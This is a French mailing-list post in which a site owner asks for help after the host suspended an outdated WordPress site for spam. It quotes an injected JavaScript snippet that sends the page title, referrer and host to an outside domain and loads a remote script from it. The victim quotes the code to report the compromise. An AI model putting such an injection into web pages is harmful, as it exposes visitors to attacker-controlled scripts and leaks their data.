[Toulibre] site free suspendu

Camille à barbe kamyapoil at free.fr
Ven 29 Jan 14:34:38 CET 2016

Bonjour,
Je gère (comme je peux) un site internet hébergé par free, propulsé par
wordpress 3.1.4.

Pourquoi je voudrais le remettre en place ?
Je l'ai mis en place pour faire suite à une inculpation au sujet d'une action
menée à Notre-Dame-des-Landes qui nous a valu deux procès avant d'être relaxés.
Pour en savoir davantage, il reste un embryon de site que j'avais mis en place
pour préparer le premier procès :http://kamyas1naz.free.fr/photos.htm
ainsi que la page facebook associée :https://www.facebook.com/kamyapoil/
Je poursuis cette démarche et ce site m'est utile pour présenter les actions
déjà menées et en préparer d'autres.

Pourquoi free a suspendu le compte ?
J'ai reçu ce message de la part de free le 27 janvier :

"Bonjour,

Ce courrier électronique vous est adressé pour vous indiquer que votre compte
Pages Perso kamyapoil a été suspendu pour la raison suivante :

Votre compte envoie du Spam (mail non solicite) via la fonction php mail()

Pour lever la suspension, consultez les newsgroups
proxad.free.services.pagesperso pour effectuer les pré-requis nécessaires à la
ré-activation de votre compte et postez votre demande dans le fil qui vous sera
indiqué. ( la page d'assistance sur le site de Free vous donnera les
informations nécessaires pour accéder à ce forum -
http://www.free.fr/assistance/541.html  ). Aucun support ne sera fait par mail.

ATTENTION : en l'absence de réaction de votre part dans les deux mois, votre
compte Pages Perso sera DETRUIT.

Cordialement,
Le service Pages Perso."

J'avais eu un signe avant coureur. A partir du mois d'octobre, des lignes de codes ont été insérées à mon insu :

<script>var a=''; setTimeout(10); var default_keyword =
encodeURIComponent(document.title); var se_referrer =
encodeURIComponent(document.referrer); var host =
encodeURIComponent(window.location.host); var base =
"http://megatest.vn/js/jquery.min.php"; var n_url = base +
"?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer +
"&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" +
encodeURIComponent(n_url); if (default_keyword !== null &&
default_keyword !== '' && se_referrer !== null && se_referrer !==
''){document.write('<script type="text/javascript" src="' + f_url + '">'
+ '<' + '/script>');}</script>

Elles se trouvaient dans l'en-tête des feuilles de style et avaient pour effet de bloquer une dizaine de secondes chaque page du site qu'on essayait de charger. Je n'y connais vraiment pas grand chose, mais un sympathisant m'a prévenu du problème et je les ai effacées. Mais elles revenaient à chaque fois, une à deux fois par semaine. J'ai pris l'habitude de les retirer. J'ai modifié le nom d'administrateur et le mot de passe, mais ça n'a pas réglé le problème. J'ai continué à effacer ces lignes de code, une à deux fois par semaine.
Je voulais changer les autres mots de passe (base de données, et je ne sais quoi d'autre), et télécharger une version plus récente de wordpress puisqu'on n'est plus limité à la version 3.1.4 depuis quelques temps, mais je ne l'ai pas fait par peur de tout planter : j'espérais trouver quelqu'un pour m'y aider. Free ne m'a pas laissé davantage de temps pour résoudre le problème et le site est maintenant suspendu. Je ne comprends pas comment faire pour accéder à la demande de free. J'ai rencontré quelqu'un de tetraneutral qui m'a suggéré de me tourner vers vous. Pouvez vous m'aider ?

Merci.